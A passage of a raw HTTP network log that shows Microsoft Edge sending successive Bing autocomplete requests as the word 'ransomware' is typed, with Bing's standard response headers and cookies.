useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Zai1eYEO9+3siZbu/D0nJtvSjSeXdK3m0EZX+ygnH6Q='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:41 GMT
set-cookie: MUID=3DCF9BEAAD3D69D628128FDEAC1068F5; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3DCF9BEAAD3D69D628128FDEAC1068F5; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=24DAF4D508D169EB0AA7E0E109FC68FD; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=1F36DBD10B3942A5A6C8BD8F982D8F61&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:41 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=24DAF4D508D169EB0AA7E0E109FC68FD; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220701.b31030b
-
GEThttps://www.bing.com/qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3ba87f8c42d447b0b151ecbe8563e4b3&oit=1&cp=5&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=rando&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3ba87f8c42d447b0b151ecbe8563e4b3&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a360ec3447eb8457551a4caae263
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-jxFtYOQTEALwXwR7wlbjwrcehMxcXp1negs8u3DqNRM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:44 GMT
set-cookie: MUID=2E1EBDC03113611D2703A9F43035603C; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2E1EBDC03113611D2703A9F43035603C; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=05C92782E04E69810EE733B6E16868B9; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=D19C083013664EE4922682E214E07595&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=05C92782E04E69810EE733B6E16868B9; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220704.b3117ed
-
GEThttps://www.bing.com/qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=690e6c7ddc2c4184a803f4195978836f&oit=1&cp=4&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=rand&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=690e6c7ddc2c4184a803f4195978836f&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a360a6294ec3a29fa496ed9346c2
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-vLzEkKFKaa1hj/oAUNTgKDxDhjN/nq9TgxvW2Ix8cpM='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:44 GMT
set-cookie: MUID=09E58A13C36A65B937959E27C2DA64C7; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=09E58A13C36A65B937959E27C2DA64C7; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1CC154F8A5C86ED8366640CCA4786F7F; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=3CFA959D41994E44A026DA784B8839CB&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1CC154F8A5C86ED8366640CCA4786F7F; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220704.b3119e6
-
GEThttps://www.bing.com/qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=eecd509c0d7347429b7f4d725c56a70b&oit=1&cp=3&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ran&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=eecd509c0d7347429b7f4d725c56a70b&oit=1&cp=3&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a36034ec4966900ec981ec05779b
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-xBf6m4tQtlcLZtMRBCHkZHo5+7X36kBmGMEKy2DhWXg='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:44 GMT
set-cookie: MUID=3833F6B9E04460DC3011E28DE1AE6104; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=3833F6B9E04460DC3011E28DE1AE6104; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=19024DBA931F62580536598E92F5634A; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=AE1F3DE7DD5942E99653732DD04728CC&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:44 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=19024DBA931F62580536598E92F5634A; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220704.b311bd5
-
GEThttps://www.bing.com/qbox?query=rans&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dea3b9b26b524edabcbc26e58dd08c7c&oit=1&cp=4&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=rans&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=dea3b9b26b524edabcbc26e58dd08c7c&oit=1&cp=4&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a361e92f401e839644d3bb9262fe
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-XMOdbgKFUT+1Sr9Fd6EaNLrrvDmXeeqBDSy16QM8dN4='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:45 GMT
set-cookie: MUID=018132D4BAA26C39019C26E0BB3C6DB7; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=018132D4BAA26C39019C26E0BB3C6DB7; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=18E240560A3C6F3E2E5654620BA26E6B; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=8D28C51B05514B46B05FC9AF7AD82E5D&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=18E240560A3C6F3E2E5654620BA26E6B; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220705.b31259b
-
GEThttps://www.bing.com/qbox?query=ranso&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=730eee639ba04f598ba6c2813d1fb3f4&oit=1&cp=5&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ranso&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=730eee639ba04f598ba6c2813d1fb3f4&oit=1&cp=5&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a36183494fffb403f1e91feb0187
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-XhrVOJ6Zm2MLiuGtCYpsva5Ldhwp8T9h7NdO5duUYeU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:45 GMT
set-cookie: MUID=0C7320970620647E059134A3073165FA; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=0C7320970620647E059134A3073165FA; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=1CCE0B14F2AE65ED35311F20F3BF6493; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=89EFE733BB70460DAE29D43DE82C004A&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=1CCE0B14F2AE65ED35311F20F3BF6493; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220705.b3126eb
-
GEThttps://www.bing.com/qbox?query=ransom&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=cdb5e947a295404abc7b8abdcbb870b1&oit=1&cp=6&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransom&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=cdb5e947a295404abc7b8abdcbb870b1&oit=1&cp=6&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a3611dc4496d9c954a81a994e6d1
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-OOX1kEvZWfV8EE4WMcPu89igkBKMscqyiVGluE+Yuuo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:45 GMT
set-cookie: MUID=2D5112DBACBE66B31CE506EFADE567CB; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=2D5112DBACBE66B31CE506EFADE567CB; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=360B263FDF246C8A37A1320BDE7F6D65; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=1092D5E5EBDB4F93A715F352D18C011D&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:45 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=360B263FDF246C8A37A1320BDE7F6D65; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220705.b3129a1
-
GEThttps://www.bing.com/qbox?query=ransomw&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3431ee381e2d45d49bb4218d53fd2dfd&oit=1&cp=7&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomw&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=3431ee381e2d45d49bb4218d53fd2dfd&oit=1&cp=7&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a3627b6d4482b5c52267d6c59596
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Y+iCSipnaokSKn4mUN0sHBhEGIE89DTZg3w9pOuUt8I='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:46 GMT
set-cookie: MUID=178BCE93A39367230B1ADAA7A200666E; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=178BCE93A39367230B1ADAA7A200666E; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=0A7238CF2A0A6460335F2CFB2B9965DE; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=7D1AA2D8CB0C40089A2FB597DBEC69F5&dmnchg=1; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20240229; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:46 GMT; path=/; secure; SameSite=None
set-cookie: _SS=SID=0A7238CF2A0A6460335F2CFB2B9965DE; domain=.bing.com; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220706.b312b35
-
GEThttps://www.bing.com/qbox?query=ransomwa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=59f1f825e4ac4c3ab22333aec1f54529&oit=1&cp=8&pgcl=4msedge.exeRemote address:92.123.128.152:443RequestGET /qbox?query=ransomwa&language=en-US&pt=EdgBox&cvid=460378d9cd004e0cad14078ef8361c0c&ig=59f1f825e4ac4c3ab22333aec1f54529&oit=1&cp=8&pgcl=4 HTTP/2.0
host: www.bing.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a362716f4ff6abf08924c948153f
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-ySZZbbVxikxHCpO5oGIPKtpvmLxNUMnvsxAE7XZ56Wo='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:46 GMT
